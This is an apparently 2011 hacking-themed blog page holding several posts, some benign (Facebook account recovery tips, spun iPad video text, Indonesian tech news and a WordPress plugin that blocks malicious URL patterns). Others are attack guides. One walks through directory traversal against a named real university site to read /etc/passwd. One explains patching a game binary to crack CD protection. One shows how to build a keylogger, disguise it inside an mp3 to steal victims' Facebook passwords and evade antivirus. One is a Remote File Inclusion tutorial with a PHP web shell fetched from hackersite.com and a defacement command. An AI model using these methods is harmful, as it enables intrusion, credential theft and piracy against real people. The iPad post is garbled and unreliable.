Facebook account Hacked! What to Do Now?

March 24, 2011 at 8:33 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial | Leave a comment

//

It would be a Nightmare for anyone whose Facebook account gets Hacked,He would wonder How to get back his Hacked Facebook account,In this article i will tell you some methods through which you can Regain your Hacked Facebook account,

Steps to take when your Facebook account gets Hacked:

1.Reset Facebook Password with Secondary email address:
When ever you sign up for a Facebook account,they ask for your Secondary email address,In case if you loose your Password you can reset it with your Secondary email address.

2.Secret Answer:
Yes you can also reset a Facebook password with a Secret Answer which you provided to the Facebook while Signing up For a Facebook account


3.Contacting Facebook:
Lastly if Hacker has changed your Secondary Email address and Secret Question then you have only one way left i.e. Contacting Facebook team for the issue.

Below i am also writting some ways to Protect your Facebook account from getting Hacked

Protect your Facebook account from getting Hacked:

1.Use Strong Passwords:
In order to keep your Facebook account From Getting Cracked with a Brute force,Dictionary or Rainbow tables you need to keep Strong password usually more than 10 letters or else it will be damn easy for the Hacker to Hack a Facbebook password

2.Use Phishing filter:
Phishing filter is a sheild which protects you from Fake login pages,These fake login pages are made to steal your passwords and Phishing filter will prevent you from logging into these kinds of pages



3.Use a good Antivirus and Antispyware:Yes,this is the most crucial step in all the above mentioned,It is highly recommended that you use a Good antivirus and antispyware program,I would recommend Kaspersky as an antivirus and as an spyware spyware cease and dont forget to update them regularly,Remember one trojan takes it all.

4.Use a Good antilogger:
Antilogger is a program which lets you know if a keylogger is present on your computer,Keylogger is a spyware program which helps you track of what is happening on your Computer.
Learn more about keyloggers

5.Use a Good Firewall:
If you want to prevent a Hacker to enter in your Computer and Hack your Facebook password than you must use a good firewall,I  personally Recommend Zonealaram firewall.Firewall is a Hindrance in Hacking,A hacker may bypass antivirus but its very difficult for a Hacker to bypass a Firewall

Hope Methods will help you to prevent your Facebook account from getting hacked,It is higly recommended that you must follow all the above Methods to ensure maximum security.

 

Hack a website using Directory Transversal attack?

March 23, 2011 at 8:30 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial | Leave a comment

//

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this locationC:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx .

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory ‘etc’ on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in ‘etc’ directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except ‘etc’ which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory ‘etc’ in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for ‘etc’ but again it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for ‘etc’ but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to ‘etc‘ directory and show us contents of ‘passwd‘ file.
To understand the contents of ‘passwd’ file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user’s input

 

CRACK CD PROTECTION

March 20, 2011 at 8:20 am | Posted in Computer, computer and high technology, computer and technology, Hacking, news, Tips and Trick, Tutorial | Leave a comment

In this Tutorial , We will going to learn how to Crack Cd Protection.How and where software and games companies save their product’s password .
Want to know how Hackers crack CD Protection of softwares and Games and get the passwords out.
This process is very simple and it is just a four step process. Click Here to Download free E-Book .

Step 1:

This step will help you with the most basic system of protection, called C- dilla, which is the most usual one…

Program Used:

Decompiler like Win32Dasm
Hiew(Editing files) Decompiler

Decomplier is used to decompile the exe files. The files we will Work with are in ExE format, and we need a program that will HeX them (transfer to 16 base, hexa, form) and locate the orders given in the code, then we will Find the line we need and change it to remove the protection with… – the Second program: we need a program that will *edit* the files, and fetch the right line number we got using the first program… all those action are easily Done w/ the programs:

Win32Dasm (the disassembler – decompiler program, added in The dir [root/Win32Dasm]), and Hiew (the editing program added in the dir [root/Hiew]). The programs are added to the tutorial, because I’m not so sure you can find then on a stable location on the net, in the dir [root/programs].

Step 2: The Easy Protection.

Okay! To save you from reading this entire tutorial for nothing you’re not going to use I made this chapter, because there is a good chance you won’t be needing it! Some games comes w/ protection as a files in the [/Setup] dir (or root dir) called: [00000001.TMP], [CLCD16.DLL], [CLCD32.DLL] and most important [CLOKSPL.EXE]… if you see any of them delete it and the protection should disappear (Important! delete them after making a mirror of the game on your HD, Using the info in the next chapter) … if you are still getting an error message just keep on reading.

Step 3: Finding the right file and right error.

The files we are going to work w/ will be the main ExE of the game: you will find it on the CD, in a dir called [/Setup] or [/data], but the easy way to find it is just installing the game, and the ExE that starts the game – will be the ExE we need! … Once you’ve got it make some room on your HD, because we are going to copy the whole CD to it… before you do that: some games have am option, when installing, to install the full game to the CD (but still needing it to play), use it if possible, the files you need to copy are all the game files, in some games it is the root dir of the CD, in others it is the [root/data] dir…

The worst case is when the game is inside a CAB file, and then you have to use a CAB extractor (WinZip 8 should do the job), and if it is protected a different program that can compile CAB format (I’ll try to put it on the tutorial as Well). Once you’ve done all that – press the ExE, and if the game opens close it and exit the CD, and then press again- you will get an error window! … Usually the line goes like: “Error, please enter CD to run game” or “CD error” or “Error
Reading CD-ROM”… what ever error you get – write it down and remember it, we are about to look for it in the ExE code, and change it!

Step 4: Finding the right line number.

Open the first program – Win32Dasm, by unzipping it and clicking on [/w32dsm89.exe], now we have to load the file we know is the main ExE of the game, so click on “Disassembler“in the main menu, then “Open File to disassemble…” (Important!) Make sure you got 50-100MB free on your HD) before then pick the file from the clone game dir you made in your HD (Important! make a backup of the ExE) … after you’ve success fully w8ed while the program disassembled the file, you will see *a lot * of gibberish… don’t worry! You don’t have to understand what is says (I don’t, and I’m not so sure ne1 does…

Except the programs of course) … (Important!) If you can’t read and the font shows only numbers and bizarre letters, click on “Disassembler” in main menu, then “Font…” then “select Font” then pick Arial or something in English) … now you have to find the exact line number out of the 2 million in the file that has the error message in it, do that by clicking the “String Data references” button, from the buttons menu (under the main menu) – the second one from the right (-your right)… now you get a list of all the lines in the ExE that refers to actions, and you have narrowed the lines from 2 million – to 2 thousand… to find the error message click the first letter it started w/ (for example, if the message was “Error reading CD-ROM” click E) then search ‘till you find the error line you are looking for! … Once you’ve found it… it will mark the title, pick the first line, and it should change color to green (that means the line can be edited and is important)… to be sure you have taken the right line: if

There is a line like:

“:0044XBCK EB08 ….. (Lots of spaces) …. Jmp 0044EBD8” or:
“:0044XBCK EB08 ….. (Lots of spaces) …. Call 0044EBD8” or:
“:0044XBCK EB08 ….. (Lots of spaces) …. Push 0044EBD8”

You are at the right line, it says the command is a function, effected by the user, and probably the protection we are looking for (notice the words: Jmp = Jamp, Call = Call, Push = Push)… now that we got the right line we have to find her number! That is done by looking at the bottom of the program window and in the line that should look similar to this one: “Line:*** Pg *** of *** Code Data @:0045821 @Offset 00045821h in file:***.exe“ Notice the number that comes after the word „Offet“in this line: 00045821h that is the line number! But notice the letter „h“at the end of it – you don’t need it, and don’t forget to remove it from the number, now – the only thing left to do is changing the line and removing the protection!

Step 5: Editing the line.

After writing down the line number you can minimize Win32Dasm, because for now we have finished using it. Open the second program: Hiew (added in the tutorial), this is an editor that will work badly for searching the right line, but will do if you know the line number and just wanna change it… open again the same game ExE you have processed in Win32Dasm. When you enter you see a lot of gibberish, that’s the code, and you need to change it to the decoded language… do that by pressing the F4 key and then pick the option “Decode“… heh! A lot better now… now click F5 key, to search the right line, You will see the line numbers at the left end of the screen is gray, enter the line number you got from Win32Dasm and it will jump you to the right location in the file… now, this is the difficult part, not hard to do – but hard to explain, near the line number (just at the right) you will see the command in HeX form, it should be something like BC1BB3D2D1 that is in HeX code (base 16) Which means a number (=byte) is represented by 2 letters/number, so that the Group (BC1BB3D2D1) is made of 5 bytes: BC – 1B – B3 – D2 – D1 … (10 numbers = 5 bytes, 8 numbers = 4 bytes and so on…), we are about to change every byte .
From D1 or BC to 90 this is done by pressing the key F3 (activates Editing Option) and pressing, for every byte, the number 90 (90 is the noop number, that Will disable the action)… and in our case, the command will change from BC1BB3D2D1 to 9090909090 … once it is done click the key F10 to save the Offset, and exit.

Step 6: Testing

Now that you have an ExE w/out the error line, activate it from the same clone Dir of the game you made to test it, if it’s working – congratulation! You have just cracked a CD protection! … If you are getting another error message redo.
The same steps you have done w/ the first error message (in chapters 3-5) to change it as well (Important! Do it on the same ExE you have edited, and backup this one as well) and then test it again. You might be needed to do it several number of times, until you are getting no error message and the game runs! chapter VII: Quick order list. Start without Cd then look at the error message and write it down.

- Search the msg in Win32Dasm reference and copy number w/out the H at the end!
– Open Hiew, F4 to Decode, F5 to search the line, and change the command – 90 for every 1   byte.
– F10 to save and then get out, don’t forget to test!

Good Luck Cracking.

Hack Facebook Password using Facebook Hacking Software

March 1, 2011 at 3:00 am | Posted in Article, computer and high technology, Hacking, news, Tips and Trick, Tutorial | Leave a comment

Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook

Everyday I get emails wherein my readers ask me How to Hack a Facebook Account? You as the reader are most likely reading this because you want to hack into someone’s facebook account. So in this post I have decided to uncover the real and working way to hack any facebook account. Actually there are many ways to hack someones facebook password like Phishing, Keylogging or using Hacking softwares used to hack facebook password. In this post i’m going to show you how to hack someones facebook account password using a keylogger – Emissary Keylogger.

How to Hack Facebook Password using Keylogger?

1. First of all Download Emissary Keylogger It takes screenshots of the victim’s computer and sends it to your gmail along with the logs.

2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won’t work.

3. Extract the files using WinRar or any other zip/unzip program.

4. Open “Emissary.exe” to see something like this:

5. Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you’re going to use only for keylogging). Enter the email adress where you wanna receive facebook passwords. Choose a name for the server.exe file. You can set timer as you wish. This timer controls the time interval between two logs emails.

6. In the “Options” section you can see what this evil little buddy can do ;)

•Block AV Sites: Blocks VirusScanning Websites on victim’s computer

•Add to Startup: Adds to Startup via Registry

•Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark

•Disable TaskManager: Disable TaskManager on victim’s PC

•Disable Regedit: Disable’s Regedit on victim’s PC

7. Check “Trojan Downloader” to Downloade and Execute a trojan on victim’s PC. You can also create a fake error message and scare your victim, like:

8. After you’re done, hit on “Build” and you will get server keylogger file created in current directory.

9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can’t send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:

Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.

Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org/ and also check the “Do not distribute the sample” option.

Convert Movies for Ipad

February 28, 2011 at 2:39 am | Posted in Article, bussiness, computer and high technology, news | Leave a comment

Ipad is likely one of the richest sources of leisure within the electronics these days. And it’s paramount that studying the strategies to transform movies for Ipad is a must. Movies have all the time been vital and excessive priority for most people . Nowadays, it has change into of paramount significance that changing movies for Ipad needs to be discovered and utilized .

If you’re wishing to watch the video on the pill then, it might be higher so that you can convert it into the iPad format. As we all know that a pill has its personal dimension, its specifications etc. the output format could be a high definition (HD) format which can be particular to the gadget .

With a purpose to convert the movies for Ipad, it’s good to use conversion softwares. The two softwares, which you can be utilized, are X-users (for Mac OS) and iFunia Video Converter (also for Mac). These softwares can give you can edge in the case of file format conversion. Utilizing these softwares or any other reliable format converting software program, you’d be capable to convert the file format into the desired one and get the file into your Ipad. Appears easy enough! And in a actuality, it’s so as well.

For Windows customers, there are many iPad video converting softwares that are equally environment friendly as their Mac counterparts. Due to the cause, the softwares have develop into well-liked among the tablet users . The iPad converters are capable of convert the file into high decision outputs that entails 720p to 640×480 resolutions with variable compression effects and quality preparations and settings.

Other features of the more refined format file conversion softwares can be conversion into MP3, AAC and WAV formats. Many of the newest softwares in cluding multimedia becoming a member of and splitting. Splitting into small chunks would also help.

Mac and Windows aside, Linux can be not far behind in this business. There are some instruments and softwares designed for Linux as well. Since, there are so many conversion softwares obtainable without cost over the web; it could not be a good idea to spend your bucks for format conversion software.

The format conversion softwares are a real handy manner to convert you r recordsdata in your Ipad. The perfect thing that you may you on your Ipad softwares are that you are able to do a research about them after which decide whom swimsuit you the best.

After all, it’s not rocket science to convert your video to Ipad format. These days Ipad and Tablet Computer have expanded a lot available in the market that it’s absolute paramount to have respectable file format conversion software.

Other things to search for your IPad softwares are that it should be strong enough to hold the load of the conversion of top of the range multimedia . Powerful softwares will then require highly effective features like extra RAM and a speedy processor. But in case you are on the lookout for quality, then you need to be prepared to settle for these elements and act accordingly.

A simple tutorial Remote File Inclusion (RFI)

February 26, 2011 at 9:34 pm | Posted in Article, computer and high technology, Hacking, news, Tips and Trick, Tutorial | Leave a comment

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that’s an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..

Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don’t have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -

•Case 1 – You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.

•Case 2 – In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.

•Case 3 – successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

echo “”;

echo “Run command: “.htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..

I leave the rest on your creativity..

“WIP-Tools”

February 25, 2011 at 8:55 pm | Posted in Article, bussiness, computer and high technology, news | Leave a comment

WIP-tools include pings, traceroutes and Reverse DNS. Pings can be performed simultaneously on all servers. This option for traces will be available soon. Use our monitoring servers to analyse the IP addresses and networks.

We have developed our own traceroute program, for a more accurate analysis three protocols will be simultaneously used: TCP(port 80), UDP, ICMP. It is the most practical option, because some routers do not respond to ICMP, the other – to UDP.

Visual display of the distance clearly shows the transitions between the hops. Moreover, you can see the AS path and the slow routers.

Examples of possible applications:

  • analyse the availability of your networks/servers all over the world;
  • test the paths and load on selected network segments;
  • choose the right hoster: how well it is located for your purposes;
  • test the honesty of your hoster/provider, to whom it is connected and what are its uplinks;
  • in case of unavailability of the server you can determine, whether the server or the channel of the provider is down and in what place;
  • all results are saved, you can share them with anyone through “Permanent link to these results”;
  • - etc..

 

Basigi, Sang Mesin Pencari Buatan Lokal

February 19, 2011 at 2:06 am | Posted in Article, computer and high technology, news, Tips and Trick | Leave a comment

Basigi, nama yang terdengar asing, meskipun untuk ukuran orang Indonesia. Mungkin mencari padanannya di Kamus Bahasa Indonesia sulit. Justru basigi ditemukan di kamus Bahasa Minangkabau, yang artinya Meneliti.

Mungkin memang itu artinya bila kita kunjungi situs ini. Situs pencarian ala Indonesia. Masih terhitung baru, jadi belum begitu banyak sumber artikel yang bisa digali di sini. Untungnya mereka menyediakan tempat untuk mengirim alamat URL.

Basigi

Uniknya, di halaman muka, basigi menyediakan tautan statistik untuk memperlihatkan penggunanya kata kunci terpopuler disini. Ada juga berita terpopuler untuk pelengkap. Bahkan, berita real time yang kini banyak dijajakan mesin pencari lain, juga disediakan disini. Lengkap dengan kata kunci dan artikel yang terkait untuk memudahkan pola pencarian terpopuler.

Di halaman hasil pencarian, juga ditemukan iklan. Sesuatu yang biasanya hanya muncul di Google untuk kata terkait. Di sini, tanpa hasil pencarian ditemukan pun iklan akan senantiasa muncul. Sekilas memang mendapati halaman ini situs ini mengincar porsi pendapatan dari iklan.

Siapa mau coba?

Amankan WordPress Anda dari Serangan via Url

February 19, 2011 at 1:21 am | Posted in Article, computer and high technology, news, Tips and Trick, Tutorial | 1 Comment

SQL Injection, Remote File Inclusion, XSS, dan segudang serangan hacking lainnya yang memanfaatkan kesalahan pemrogaman cukup ampuh dalam melumpuhkan banyak website, khususnya website dinamis, bahkan persepsi free cms yang menggunakan bahasa pemrogaman website, seperti php, atau asp adalah sangat tidak aman dan sangat rentan terkena serangan seperti ini, sebut saja joomla, yang telah lama menjadi langganan cms yang paling favorit untuk di serang, begitu juga dengan wordpress, hampir sama dengan cms tetangganya. Apa sebabnya?? Kebanyakan seperti yang saya sebutkan tadi, kesalahan pemrogaman entah itu tidak di sengaja, atau mungkin disengaja oleh developernya? ya mungkin saja disengaja :). Apa akibatnya?? Hal ini kemudian dimanfaatkan oleh para cracker-cracker attacker/destroyer/defacer untuk berbuat kreatifitas yang mencukup mencengangkan para admin. Ada yang mungkin menulis surat cinta untuk kekasihnya di halaman website yang serang, “Oh dinda dimanakah kau berada, rindu aku ingin jumpa…” :D atau mungkin kreatifitas lain yang tentunya bersifat vandalisme. Mengganti username dan password admin. Itu adalah segilintir akibat dari serangan menggunakan url, benar-benar cukup fatal, bahkan beberapa tahun yang lalu, KPU yang nyata-nyata menggunakan uang rakyat hingga bermilyar-milyar untuk sistem keamanan databasenya bisa di hack hanya dengan menggunakan browser. Ini menjadi hikmah bagi para admin yang lain, jangan pernah sekalipun mencongakkan kepala anda. . Karena tidak ada sistem yang 100% aman. Maaf, saya lupa dengan pembahasan inti kita.

Artikel ini dikhususkan kepada anda yang menggunakan wordpress sebagai core dari website anda, baru-baru ini perishablepress.com membuat suatu plugin yang dapat dapat menangani serangan via url. Setidaknya dapat mencegah web anda dari serangan-serangan walaupun tidak 100% aman.

Caranya cukup mudah, cukup download file blockbadqueries.php.txt, kemudian rename menjadi blockbadqueries.php, lalu letakkan di dalam direktori wp-content/plugins website anda. Dan aktifkan pluginnya via dashboard wordpress anda.

File blockbadqueries.php berisi …

<?php
/*
Plugin Name: Block Bad Queries
Plugin URI: http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/
Description: Protect WordPress Against Malicious URL Requests
Author URI: http://perishablepress.com/
Author: Perishable Press
Version: 1.0
*/
global $user_ID; if($user_ID) {
if(!current_user_can(‘level_10′)) {
if (strlen($_SERVER['REQUEST_URI']) > 255 ||
strpos($_SERVER['REQUEST_URI'], “eval(“) ||
strpos($_SERVER['REQUEST_URI'], “CONCAT”) ||
strpos($_SERVER['REQUEST_URI'], “UNION+SELECT”) ||
strpos($_SERVER['REQUEST_URI'], “base64″)) {
@header(“HTTP/1.1 414 Request-URI Too Long”);
@header(“Status: 414 Request-URI Too Long”);
@header(“Connection: Close”);
@exit;
}
}
}
?>

Sumber : http://www.wprecipes.com

ViewSonic V350 Android Phone dengan Dual SIM dan ViewPad 10Pro Win7/Froyo slate dirilis

February 19, 2011 at 1:00 am | Posted in Article, bussiness, computer and high technology, news | Leave a comment

Sebuah smartphone dual-SIM dengan dual-boot tablet akan dirilis di Barcelona minggu depan. V350 ViewSonic dengan HVGA 3,5-inci Android 2.2 Froyo handset yang dapat menjaga dua SIMs aktif bersamaan, dan paket kamera 5-megapiksel, WiFi, Bluetooth 2.1, A-GPS dan slot kartu microSD.

Sementara itu ViewSonic ViewPad 10Pro dengan ukuran 10-inch dan kapasitas 1024 x 600 tablet yang mepunyai dua OS dapat boot ke Windows 7 atau Froyo. Memiliki koneksi 3G, WiFi dan Bluetooth, dan ketahanan baterai 6 jam non stop.

lihat video ViewPad10Pro Win7

Next Page »

Blog at WordPress.com. | The Pool Theme.
Entries and comments feeds.

Follow

Get every new post delivered to your Inbox.